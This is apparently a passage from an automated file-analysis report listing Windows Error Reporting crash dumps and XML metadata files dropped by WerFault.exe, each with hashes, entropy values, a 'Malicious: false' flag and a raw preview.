                  Preview:MDMP..a..... .......b..f............$...............,...........,,..........T.......8...........T...........x...............(...........................................................................................eJ..............GenuineIntel............T...........`..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6342
                  Entropy (8bit):3.7262497764271845
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJRI6IHyjbBYXrpB789bzMsftxm:R6lXJ+6IHyJYXozffS
                  MD5:C1B9A14BD6E869292DE6550C59BA20B7
                  SHA1:2C478334BA5CE9CA4321145BFCF559493ED830D4
                  SHA-256:7CFE91D1195A9E80F49C8D22D583C89256B7268E14196EC11CE457FB535A7D5A
                  SHA-512:91DFE45551045781D7E325DC75A91CB2DDDB91DA3BE5E2A7E30EF93211BDDEFFDD8F2212C835E04BF930B78226D4665D7592D09C454EFDC61A2E17B7110013BD
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.1.2.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4599
                  Entropy (8bit):4.473059239044667
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsMJg77aI9ZCjWpW8VYnoYm8M4J00FobTmT+q8Z/1CBHIcd:uIjfKI7+S7VcFJyTie1CVIcd
                  MD5:A9DCF24734E11194C9936ECBEC2F2046
                  SHA1:37040DCACACE6F9029D0D2A7D409E87EABAF3F92
                  SHA-256:FD4516CC8B25FB173845C5CB3BC19ADE13DC900956957BC79064565271AEE7C8
                  SHA-512:8A90230969002DB11A83E15C507C732F49301A2D3D42D97C7D592EE18585F67CAD7E0971AE4FCADFC4FD01A80E5F6718772F46487BF6CD68B92671301703C814
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405038" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Jul 10 15:36:03 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):66222
                  Entropy (8bit):2.13496635854332
                  Encrypted:false
                  SSDEEP:384:rnMzr2Lauk7VYflbJ7t4K7kien6vBCezj+rDc:rMzr+dbJt06vBQrDc
                  MD5:CEEBDC815EAC2D73C133D47F76A9C4FD
                  SHA1:E6C85E22E9BA7426A48BBF25353B38F3F0F5605E
                  SHA-256:6D624FEFE961F884AAB2734C6022420E372E4755C318BFC2C38C954BD144CD19
                  SHA-512:328B24605CC52043B3EBA1501407865FA49DA102BB79A678CAD3C825A9CF76963232F81E3C89C5E10C32FF648EE35C657B9B86FA3B8C63F049765C7C5EE33C05
                  Malicious:false
                  Preview:MDMP..a..... .......c..f............$...............,...........<-..........T.......8...........T.......................................................................................................................eJ..............GenuineIntel............T...........`..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6342
                  Entropy (8bit):3.7258305499339985
                  Encrypted:false
                  SSDEEP:96:RSIU6o7wVetbR+6My+XPxYBxFXYED5aMOU7x89bqMsfxum:R6l7wVeJR+6MFZYXrpB7x89bqMsfxum
                  MD5:ED41344ADFAADB4B250923A10FF002E2
                  SHA1:6CB66580286A6F7B5A53E6E9EF1E19347F4A31D8
                  SHA-256:A2073A0BD5556508044580748DBFC30BC107BD4C917676FC16CDB405BF08F4F5
                  SHA-512:C26ED8C85518AB7C0E09B1EBB4680424BBEDB66F94D4C242E954B9E288CFDBEFBD4C155E4A89F37B887ABDC832BE39CA584119A67DB15B147042BCA4FFBEB707
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.1.2.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4599
                  Entropy (8bit):4.475543969206694
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsMJg77aI9ZCjWpW8VYhYm8M4J00FiJ+q8Z/1CBHIcd:uIjfKI7+S7VVJse1CVIcd
                  MD5:4759A446D451DB4B65BBFEF1622F7732
                  SHA1:DA95EF18EEB35568E7A1650EC8BA81846F32CE6B
                  SHA-256:0B873743861831038EA2D9F75EEEEF3F036DA9552E89384699D572D8BC80F75D
                  SHA-512:331CDBC40277057F3548241BA0CD121EF9BFBBB8E111457F784CA3916E4FDD7BD31073CD0DD5481FA9AE17393456F6F8C79EE4B45CBB7358A0546AF8CE6AC71C
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405038" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:00 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):52392
                  Entropy (8bit):2.200574141196255
                  Encrypted:false
                  SSDEEP:192:hk0BIYzX+TagkJtktOvP+TjJg3XBqQZFLzYa1X9UXeZ9ntHSsB9gCdOJ6utlY:q1TagkDvMJoqQ/tfUXeZ9nd/jXwJ/
                  MD5:A65593DDD06D2DB3E3B7B728EAB84C2C
                  SHA1:4ED461B88A0E975938944CB3A598093C462F3CF4
                  SHA-256:AC9EC715F24750C1B024F20CFE7B5A458E696B70C7203A6E5B5854A76C2CAC74
                  SHA-512:34AE1168FCC0A0238CB8EDBAAD7E3284B6BAA717848E05F9F535769A95DB8E3254F241D0AA75318FA216FFDDA603B590637527FE6F0BC9DDE1E6636D11022178
                  Malicious:false
                  Preview:MDMP..a..... .......$..f....................................<................+..........`.......8...........T.......................................................................................................................eJ......`.......GenuineIntel............T.......L...!..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.6967496771542234
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCl6r6Y2DoSUs/gmfBTrpBH89bSHsfaZGm:R6lXJY6r6YFSUMgmflMSMfy
                  MD5:3FADE6E8D3DC2433D1B3A9CCAAF67CDB
                  SHA1:5420A540C4862332C5C1FB66824DEACAE3A7F8A0
                  SHA-256:C6996D3B3510E36300223F886760247E098ACCD2F303DF3A04A3CEF43282F103
                  SHA-512:F1C13D6259A46715AA65D98A60E5C91C2B3BDFC65FDFF712125683D082A8FDF24BC9E9B80A992C5D5F1FFC3481F68B66EB87CC7C37749B3284A643A6BC314A41
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.4634257767930325
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYUYm8M4J40F+G+q8xDPsJLYhsd:uIjfLI7+S7V8JNGPsFYhsd
                  MD5:15B11DE01D40A57F0392689663E2C564
                  SHA1:03848D696B2C841B7421407BB5C47195EBC1D648
                  SHA-256:5561674660ABCCDB98A6E18C9AC109D72F3199D3A165B130EB6EEECD2B236D10
                  SHA-512:172BA67B182226CF3FC989BD31930B850379D452B3F073527D761AA271F0DA89244089199A1DC4A0476BE1E847FD7013D628779697F4C28DB5DC2184A176FFAE
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:00 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):64412
                  Entropy (8bit):2.2725246122385885
                  Encrypted:false
                  SSDEEP:384:TJ8Sf4jHQvp+Q4MjnNTAv5cBtfUXeZ9ndj4eyPE:TFwrQvpYMjNTiGNUXudfy8
                  MD5:8741B303AF7BBBFC2861F861465AC961
                  SHA1:B882F091A40B57A7BB3B935FA269C85562B52868
                  SHA-256:A9DAC4C3B0FB574851E7A771D293F5C8588F2E01543FFB78CE5B889E7A83C912
                  SHA-512:6E3A8A504E144B7B534F3F0EC95A46E3BADCE5B18CC3A189C327F3AEC92FA6E1FFD1B338C3603465D30D79459A4164A855C00001935D067A4C78AFF2647EF351
                  Malicious:false
                  Preview:MDMP (minidump; unprintable bytes omitted; recoverable strings: GenuineIntel, Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406)
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.6979591474134494
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCY6k/46Y2D5SUs/gmfBTrpBRC89bSHsfWGm:R6lXJl6j6Y0SUMgmflN7SMf+
                  MD5:76F39AEF1EAA83C30B1B289274536174
                  SHA1:24AD2A05DF356F49DAAB3DA59CB51405250A957A
                  SHA-256:8DDE8A6C229627E6C98934F14A46B87362DE371BECB2F2A9794A529BF3315CBC
                  SHA-512:C6C55D14692BA04147C19F54C3518AC6BEFCB4EFD5C62C0F9276E4C0A64BC2F8FB1042374A46DE94CB26DE6A6B34B845B44617A21F4627FA2A3D9F3EE9463CD7
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>3916</Pi
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.466918054842349
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYeFnYm8M4J40Ft+q8xDPsJLYhsd:uIjfLI7+S7VBF6JRGPsFYhsd
                  MD5:0BCE98873F135A82DE855C51FB63D3F6
                  SHA1:62936F867FC1FC22B5B106217C95D1188F9F4A51
                  SHA-256:DCF38D42862F47E475858B499DEED799262187781DD77BD15B9AD6C0D0192E3F
                  SHA-512:38CC6715CF965923466145E43E932FB1A6F1A5656EA495CB44C5FD9F41937A689A455BB20E4894AE0C24176A948B2EC6959B3A215A9B7E6A2E59D82DD67A9407
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:01 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):80938
                  Entropy (8bit):2.1033527158865586
                  Encrypted:false
                  SSDEEP:384:WN7PZTf6Tqvpv7Q+sgQuTjYTT2XbtfUXeZ9nxRBweI+:WNFrXvpvLsBuTMTT2rNUXuxIe
                  MD5:E9F92A6FB04A01C4C82141F63B5682C1
                  SHA1:78DDD75299D5EC791B5C2FE266F3E2209E0CFBF9
                  SHA-256:03DBF0518C09387B824A8A9CE6ECD5DDE674809C1D25D196A65E0D0170A2087B
                  SHA-512:4494487C95F7FBC685CDE861835B94C514DD659C18826A4111F4EB7C25D897843C9029F8E9FA76A3E8C0B036A00F5EB242775AB993EF9FD793A3DDB027D1CB02
                  Malicious:false
                  Preview:MDMP (minidump; unprintable bytes omitted; recoverable strings: GenuineIntel, Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406)
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.6981908636732306
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCI6Y6Y2D+SU6nBGgmfBTrpBP89bbHsfBJm:R6lXJ16Y6YzSUlgmflkbMfe
                  MD5:DEAB7B4FC97CD4467AFC07C50B305D75
                  SHA1:91A0DF32B049B9D4266B1178E7450054A967A46F
                  SHA-256:BC1CC8324B7B7C443E9FDF4551111D97C8E4BE301E72FAA1E6D978EEA328B11F
                  SHA-512:1261AB8D4666780084FE83964A3495BB3728EFD57407F78EF8747172255A8FC0EAF0E5E25D5428D7625D9C13E87E46224CD15BE1405BCF46B9CEAF1D88FBD207
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>3916</Pi
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.466596329243718
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VYiYm8M4J40FC+q8xDPsJLYhsd:uIjfLI7+S7VKJOGPsFYhsd
                  MD5:F073FBAF65096E8A2017FEF2C1B00243
                  SHA1:6080C22B98AB19E2882C2DA6924267FBB9C026E5
                  SHA-256:E5881E829E184B06E0647A603999C72E61930965E6DE9DC654A60DA11A470A24
                  SHA-512:ED268A92107E154700B5D9E8B2E43DA0D7AFB0B1E202B939E691535B1022C9F7B0CC7C79FEC8BF7807CD9765A69356A0E6ECEFD6F915F98A5843903F439F0B11
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:02 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):84984
                  Entropy (8bit):2.2253220906066256
                  Encrypted:false
                  SSDEEP:384:Y0PZTf6TqhvpuUYQfEmuFrzgOArzTqivYTa2XbtfUXeZ9nxLJAAu/n:YarRvpuUVEZF/gZTqiQTa2rNUXux6Au
                  MD5:1F1F9C6D29808F27363DAF1DA37DE638
                  SHA1:C6E8AB40D9EA206CC833FF39272A3077E15E3B26
                  SHA-256:9B5645FB8D081450AB695175E686DD9141D0839F92CC7D32746C85CAF1AA26AE
                  SHA-512:A07956FBF5AF892B2B7CDA231DBB799A08DF00E4A11A37EAB7EB9F54B908F499BFBA7191D7A88963BC8585DB4D68063BF46C410CCA2A3D9D562ED9EB22B7A688
                  Malicious:false
                  Preview:MDMP (minidump; unprintable bytes omitted; recoverable strings: GenuineIntel, Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406)
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.7008216570069044
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCP6pb+6Y2D7SU2cy0jgmfBTrpBa89bgHsfGgm:R6lXJC686Y2SUtRjgmflXgMfY
                  MD5:EFBE90C2FC0B775A70C1E068CF771A01
                  SHA1:A554DB9A1553B7B2E802F6124D907B440D8A5C7A
                  SHA-256:000853A07071F09E41779FAC2C36A42BBA2210840961A066D94A42A7D7D107DE
                  SHA-512:B8C753D42001C5B960AAA9B109D3FDA965A84CB42BB572427FBF72FC383E091E439E3B33234CD70AD2E01BE2B758641537BF0CEE5CDCF74D6A0D18509EDC3ED3
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>3916</Pi
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4589
                  Entropy (8bit):4.465049546111846
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs5Jg77aI9ZCjWpW8VY0Ym8M4J40Fu+q8xDPsJLYhsd:uIjfLI7+S7VkJCGPsFYhsd
                  MD5:C3322AC578488AAD62F36963A186324B
                  SHA1:62DD46D8B099F3D294BCC1CA4653495E14CAAE1B
                  SHA-256:7DD63DF452FACD9AF41C78864CD77D215BD0FA69455973D1AB461210E4A6C46C
                  SHA-512:90A102B28EEE8430E59B996FBCC4EFB493D05AEBF2771749522C6552AE3E896EDC319EFB608C21A8B1C52BFF8DFEAFEA9F7F5A730E097AD78CB10B3C6262EB72
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Jul 10 15:35:03 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):80396
                  Entropy (8bit):2.1443725918704124
                  Encrypted:false
                  SSDEEP:768:B6CKvp5KssJmYYTZMS0NUXuxbjZwZuLun:pS5kmTT1KUXuxbjZwZ86
                  MD5:16AB8FFCC4D1A18A9CC96E9A836019B0
                  SHA1:E688E203BA0A934D541F56287864650E1925229E
                  SHA-256:E9D317E6B9BA4AB2E151D4CABB84E130CBABD71ED04464C4FDBB7CC02914B94A
                  SHA-512:1D73BAB103C445217E946F9B443F2F7B8F69DBC3C4C6F1B38BD2AE49250D985371C143E06DD36AD9F2614484563C6691996CA09AC698AF82B1E25671A6C3BDE0
                  Malicious:false
                  Preview:MDMP (minidump; unprintable bytes omitted; recoverable strings: GenuineIntel, Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406)
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8340
                  Entropy (8bit):3.6990931410760512
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJPCF6yT6Y2DWSU2cy0jgmfBTrpBP89bpHsf2jm:R6lXJY6u6Y7SUtRjgmflkpMfT
